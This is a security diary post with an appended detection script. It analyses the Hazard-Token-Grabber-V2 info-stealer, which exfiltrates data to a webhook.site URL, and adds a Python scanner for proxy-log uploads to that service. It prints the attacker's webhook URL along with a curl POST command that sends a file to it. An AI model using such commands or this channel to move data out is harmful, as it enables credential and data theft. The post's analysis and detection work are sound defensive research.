We have already reported multiple times that, when you offer an online (cloud) service, there is a good chance that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through
The malicious tool is Hazard-Token-Grabber-V2, which has been available on GitHub[2] for a few days. At the time of writing it has a very low VT score: 3/56[3]. The script extracts a lot of information from the infected system:
How does it work? The script posts the collected data to the webhook URL https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2. I sent this request to it:

$ echo "This is a far file" >file.txt
$ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2

Data is instantly received by the webhook that the attacker is probably monitoring:

A very efficient and stealthy way to exfiltrate data! From a defender's point of view, this is plain HTTPS to a legitimate service, so there is little to match on besides the destination itself: alert on (or block) requests to webhook.site from hosts that have no business using it, and treat the UUID in the path as the attacker's identifier for correlation.

[1] https://en.wikipedia.org/wiki/Webhook

Xavier Mertens (@xme)
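To turn the observation above into a detection, the following script (an added example, not code from the diary or from the Hazard-Token-Grabber-V2 project) scans proxy log lines for requests to webhook.site, keeps only those with a request body (POST/PUT/PATCH) going to a per-webhook UUID endpoint, and aggregates bytes sent per client and token. The log format (timestamp, client IP, method, URL, status, bytes sent, user agent) and the log lines themselves are constructed for this example; the UUID is the one observed in the diary.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample proxy log (not from the original diary).
# Assumed layout: timestamp client method url status bytes_sent user_agent
SAMPLE_PROXY_LOG = """\
2021-12-01T10:00:01Z 10.0.0.15 GET https://example.com/index.html 200 312 Mozilla/5.0
2021-12-01T10:00:07Z 10.0.0.15 POST https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2 200 18432 python-requests/2.26.0
2021-12-01T10:00:09Z 10.0.0.22 GET https://webhook.site/ 200 5120 Mozilla/5.0
2021-12-01T10:01:30Z 10.0.0.15 POST https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2 200 2048 python-requests/2.26.0
2021-12-01T10:02:00Z 10.0.0.31 POST https://api.example.net/upload 200 900 curl/7.79.1
"""

# A webhook.site endpoint: the first path component is the per-webhook UUID token.
WEBHOOK_SITE_RE = re.compile(
    r"^https?://webhook\.site/"
    r"(?P<token>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})",
    re.IGNORECASE,
)

# Methods that carry a request body and can therefore move data out.
UPLOAD_METHODS = {"POST", "PUT", "PATCH"}


@dataclass
class Hit:
    timestamp: str
    client: str
    method: str
    token: str
    bytes_sent: int
    user_agent: str


def parse_line(line: str) -> Optional[Tuple[str, str, str, str, str, int, str]]:
    """Split one log line into fields; return None for malformed lines."""
    parts = line.split(maxsplit=6)
    if len(parts) < 7:
        return None
    ts, client, method, url, status, size, ua = parts
    try:
        size_int = int(size)
    except ValueError:
        return None
    return ts, client, method.upper(), url, status, size_int, ua


def find_webhook_exfil(log_text: str) -> List[Hit]:
    """Return every request that uploads a body to a webhook.site UUID endpoint."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, method, url, _status, size, ua = rec
        m = WEBHOOK_SITE_RE.match(url)
        # A GET to the site root is someone browsing the service, not exfiltration.
        if m and method in UPLOAD_METHODS:
            hits.append(Hit(ts, client, method, m.group("token").lower(), size, ua))
    return hits


def summarise(hits: List[Hit]) -> Dict[Tuple[str, str], Tuple[int, int]]:
    """Aggregate (client, token) -> (request count, total bytes sent)."""
    agg: Dict[Tuple[str, str], List[int]] = defaultdict(lambda: [0, 0])
    for h in hits:
        key = (h.client, h.token)
        agg[key][0] += 1
        agg[key][1] += h.bytes_sent
    return {k: (v[0], v[1]) for k, v in agg.items()}


if __name__ == "__main__":
    found = find_webhook_exfil(SAMPLE_PROXY_LOG)
    for h in found:
        print(f"{h.timestamp} {h.client} {h.method} token={h.token} "
              f"bytes={h.bytes_sent} ua={h.user_agent}")
    for (client, token), (count, total) in summarise(found).items():
        print(f"{client} -> {token}: {count} uploads, {total} bytes")
```

The token is the useful pivot: the same UUID seen from several hosts means one operator and one campaign, and the byte counts distinguish a one-off test request (such as the curl above) from a full dump of browser and token data.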
Xme, ISC Handler, 687 posts, Dec 1st 2021